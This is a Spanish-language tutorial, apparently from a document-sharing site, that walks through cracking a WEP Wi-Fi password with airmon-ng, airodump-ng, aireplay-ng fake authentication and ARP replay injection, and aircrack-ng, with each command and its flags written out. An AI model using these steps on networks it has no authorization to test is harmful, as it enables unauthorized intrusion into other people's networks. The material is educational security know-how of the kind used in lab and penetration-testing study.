Вы находитесь на странице: 1из 9

Iniciando El Ataque Con Backtrack

El siguiente paso es preparar nuestra tarjeta de red inalambrica para ello lo primero que hay que
hacer es abrir una terminal y usar el comando
airmon-ng
Aqu podemos ver nuestras tarjetas de red. Comnmente la que utilizaremos es wlan0 pero
tambin puede ser ath0 u alguna otra cosa.

Lo siguiente es poner la tarjeta en modo monitor, para ello hay que utilizar el comando
airmon-ng start wlan0
En donde wlan0 es nuestra interfaz de red. Como podemos ver el modo monitor se activ en la
interfaz mon0 que es la que utilizaremos de ahora en adelante.

El siguiente paso es escanear las redes disponibles, para ello utilizaremos el comando
airodump-ng mon0
donde
mon0 es nuestra interfaz de red
y obtendremos lo siguiente:

Despus de un rato hay que presionar Ctrl+c para detenerlo. Hay que anotar el canal, y la direccin
MAC (BSSID) pues la utilizaremos ms adelante.
El siguiente paso es comenzar a capturar los paquetes de la red, para ello utilizaremos el comando
airodump-ng -c 1 --bssid 98:2C:BE:D8:E6:22 -w crackwep mon0
donde:
-c = Canal en donde est la red
--bssid = Direccin Mac de la red
-w = Nombre del archivo en donde se guardaran los paquetes
mon0 = Nuestra interfaz de red
Y aparecer una ventana parecida a la anterior, pero ahora slo aparecer dicha red y se estarn
guardando los datos en un archivo en la carpeta root.

Lo siguente es abrir una nueva pestaa en la terminal y hacer una falsa autentificacin para poder
inyectar paquetes ms adelante. En esta nueva pestaa utilizaremos el comando
aireplay-ng -1 0 -a 98:2C:BE:D8:E6:22 mon0
Donde:
-1 = Flag de aireplay para la falsa autentificacin, el 0 indica cada cuando se hace la falsa
autentificacin.
-a = MAC de la red.
mon0 = Nuestra interfaz de red.
Aparecer algo as:

El siguiente paso es capturar peticiones ARP e inyectarlas para generar paquetes que nos serviran
para crackear el pass. Para ello utilizaremos el comando
aireplay-ng -3 -b 98:2C:BE:D8:E6:22 mon0
Donde:
-3 = Flag de aireplay para capturar y reenviar peticiones ARP
-b = MAC de la red
mon0 = Nuestra interfaz de red
y debe aparecer lo siguiente:

Que despus de unos minutos debe comenzar a capturar paquetes ARP:

En la siguiente imagen podemos ver como aumentan los Iv's que son los que necesitamos para

crackear la pass WEP y aparecen como #Data en la pestaa de airodupm-ng:

Normalmente con 5000 Iv's podemos comenzar a desencriptar la clave, pero con unos 20000 es un
poco ms seguro, en este caso ya tenemos 18000 y aumentando por lo que ya podemos utilizar
aircrack-ng. Para esto vamos a utilizar el domando
ls

Aqu podemos ver los archivos que tenemos en la carpeta root, como podemos ver estn los
archivos de captura que he tomado para el tutorial as como algunos otros, de aqu el que nos
servira es el de crackwep-01.cap Que regresando un poco fue el nombre que le dimos al utilizar en
airodump-ng la opcin -w, pero slo habiamos puesto crackwep, es por eso que utilizamos el
camndo "ls"
El archivo que utilizaremos siempre ser el que tenga la extensin .cap
Ahora que tenemos el nombre, llego la hora de usar aircrack-ng, para esto usaremos el
comando
aircrack-ng crackwep-01.cap
Donde:
crackwep-01.cap es el nombre del archivo que creamos con airodump-ng y en donde se
guardan los paquetes. Entonces aparecer algo as;

Como podemos ver, tuvimos los Iv's suficientes y la clave a parece a un lado de KEY FOUND y
aparece entre corchetes; la clave seria "0701714181"
Y bueno eso fue todo :)
Este tutorial es diseado para su funcionamiento cuando hay alguien conectado a la red, de otra
manera ser un poco ms complicado. Son otros dos mtodos utilizando tambin aircrack, y
espero poder subir el tutorial la prxima semana, el problema es que mi mdem slo es vulnerable
a este tipo de ataques pero espero conseguir otro para el tutorial.
Recordemos que hay modems con mayor seguridad que otros y durante el tutorial se pueden
encontrar problemas como en la falsa autentificacin. Algunos modems tienen un filtro MAC el cual
slo permite conectarse a las direcciones que introduzcas en el mediante su interfaz.
Tambin es necesario tener buena seal, de otra manera habr un poco ms de dificultades pero
es un hecho que el tutorial funciona.